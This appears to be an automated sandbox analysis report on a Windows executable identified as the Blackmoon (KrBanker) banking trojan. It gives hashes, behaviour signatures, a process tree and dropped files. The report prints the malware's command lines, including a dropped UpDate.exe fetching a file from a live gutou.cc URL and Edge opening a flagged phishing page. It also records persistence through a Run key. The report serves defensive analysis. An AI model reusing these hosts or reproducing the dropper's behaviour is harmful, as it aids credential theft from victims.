Analysis
-
max time kernel
147s -
max time network
175s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26-11-2022 07:30
General
-
Target
2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe
-
Size
604KB
-
MD5
ea13f85983129c01aaba80dfc9f32233
-
SHA1
0318b55671868e14e4d979ac27ff106f48be9217
-
SHA256
2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2
-
SHA512
c68afc560295af176ac2c0aed1e4cf98d9b2c9ef93beb33f62a0c763b3ceeb499ae19f4f6de25da77162f2cecdb00b36945fc31cdad5e2b7a3acedad948276e2
-
SSDEEP
12288:816zhbcKiFyKBU/eEr3kxoj2x2P7F+Wu:pdbyyKymE7kydP7Y/
Score
10/10
Malware Config
Signatures
-
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
-
Detect Blackmoon payload 6 IoCs
-
Detected phishing page
-
Executes dropped EXE 2 IoCs
-
UPX packed file 38 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe"C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exeC:\Users\Admin\AppData\Local\Temp\data\UpDate.exe 3.0 %43%3A%5C%55%73%65%72%73%5C%41%64%6D%69%6E%5C%41%70%70%44%61%74%61%5C%4C%6F%63%61%6C%5C%54%65%6D%70%5C%32%37%37%33%33%34%35%64%62%33%31%32%36%30%63%35%35%61%61%36%31%33%33%63%34%30%39%39%36%31%61%66%34%38%35%62%30%64%37%66%61%62%63%65%65%35%37%32%36%31%61%62%64%39%62%63%37%66%65%32%33%63%64%32%2E%65%78%65 ¼Ù http://www.gutou.cc/up/shiyimiaozan.txt2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exeC:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exe ÃüÁîÆô¶¯3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://gutou.cc/ad/shiyi/dingyue.htm4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffea9c646f8,0x7ffea9c64708,0x7ffea9c647185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ac175460,0x7ff7ac175470,0x7ff7ac1754806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3478626528107692307,11631768624336880468,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\tongji[1].htmFilesize
952B
MD5cf2bedfd4ff8ce5fbd375ca0dc747811
SHA116e7a931e04c0c688725b2f37ce1644207b7e95a
SHA256ed1420a16d363df60d5fa90e4bfbf6ae3902f503322b958d80fb5ffb9e64028d
SHA51232df0cd0809a17b77aa126b66a07b7b603e612af28b741dccdd5ffd2c4395d0874cbb89e84bbaf96b7d139d65cbed1a766a01dc83b7dcf86559f0c4589b9199a
-
C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exeFilesize
604KB
MD53c362cb98820014d83ab407877785ad4
SHA171119f25e7c84111249f208691bf200b962130e3
SHA256528434b52104c2caebc60d93aebaa36a0290b058c0ca8527231447807454f8af
SHA5128b8f79e0bde0bc40d192865763d577ee69a29e66efb3ae3fe29503f94b3eddfc1d2e801872e043bda23ec83f92ef37ef0d58b574b501fd78c823a43a8c3855f4
-
C:\Users\Admin\AppData\Local\Temp\2773345db31260c55aa6133c409961af485b0d7fabcee57261abd9bc7fe23cd2.exeFilesize
604KB
MD53c362cb98820014d83ab407877785ad4
SHA171119f25e7c84111249f208691bf200b962130e3
SHA256528434b52104c2caebc60d93aebaa36a0290b058c0ca8527231447807454f8af
SHA5128b8f79e0bde0bc40d192865763d577ee69a29e66efb3ae3fe29503f94b3eddfc1d2e801872e043bda23ec83f92ef37ef0d58b574b501fd78c823a43a8c3855f4
-
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exeFilesize
213KB
MD522ec9bd8587c55918707d4af545317e1
SHA1970c756dd66ea3454718b685dd90afd6f9c06993
SHA256d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc
SHA512057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c
-
C:\Users\Admin\AppData\Local\Temp\data\UpDate.exeFilesize
213KB
MD522ec9bd8587c55918707d4af545317e1
SHA1970c756dd66ea3454718b685dd90afd6f9c06993
SHA256d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc
SHA512057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c
-
\??\pipe\LOCAL\crashpad_3844_TIHGHNQANZVORVXGMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/720-241-0x0000000000000000-mapping.dmp
-
memory/996-228-0x0000000000400000-0x00000000005AF000-memory.dmpFilesize
1.7MB
-
memory/996-200-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-183-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-186-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-185-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-188-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-233-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-232-0x0000000000400000-0x00000000005AF000-memory.dmpFilesize
1.7MB
-
memory/996-229-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-202-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-204-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-181-0x0000000000000000-mapping.dmp
-
memory/996-198-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-196-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-194-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-192-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/996-190-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/1820-243-0x0000000000000000-mapping.dmp
-
memory/1856-248-0x0000000000000000-mapping.dmp
-
memory/2204-176-0x0000000000000000-mapping.dmp
-
memory/3196-247-0x0000000000000000-mapping.dmp
-
memory/3412-239-0x0000000000000000-mapping.dmp
-
memory/3436-171-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-156-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-180-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-134-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-179-0x0000000000400000-0x00000000005AF000-memory.dmpFilesize
1.7MB
-
memory/3436-142-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-144-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-175-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-173-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-146-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-170-0x0000000000400000-0x00000000005AF000-memory.dmpFilesize
1.7MB
-
memory/3436-168-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-166-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-164-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-162-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-138-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-132-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-140-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-148-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-150-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-160-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-158-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-152-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-133-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-136-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3436-154-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/3772-231-0x0000000000000000-mapping.dmp
-
memory/3844-230-0x0000000000000000-mapping.dmp
-
memory/3892-245-0x0000000000000000-mapping.dmp
-
memory/4168-236-0x0000000000000000-mapping.dmp
-
memory/4184-249-0x0000000000000000-mapping.dmp
-
memory/4528-250-0x0000000000000000-mapping.dmp
-
memory/5068-235-0x0000000000000000-mapping.dmp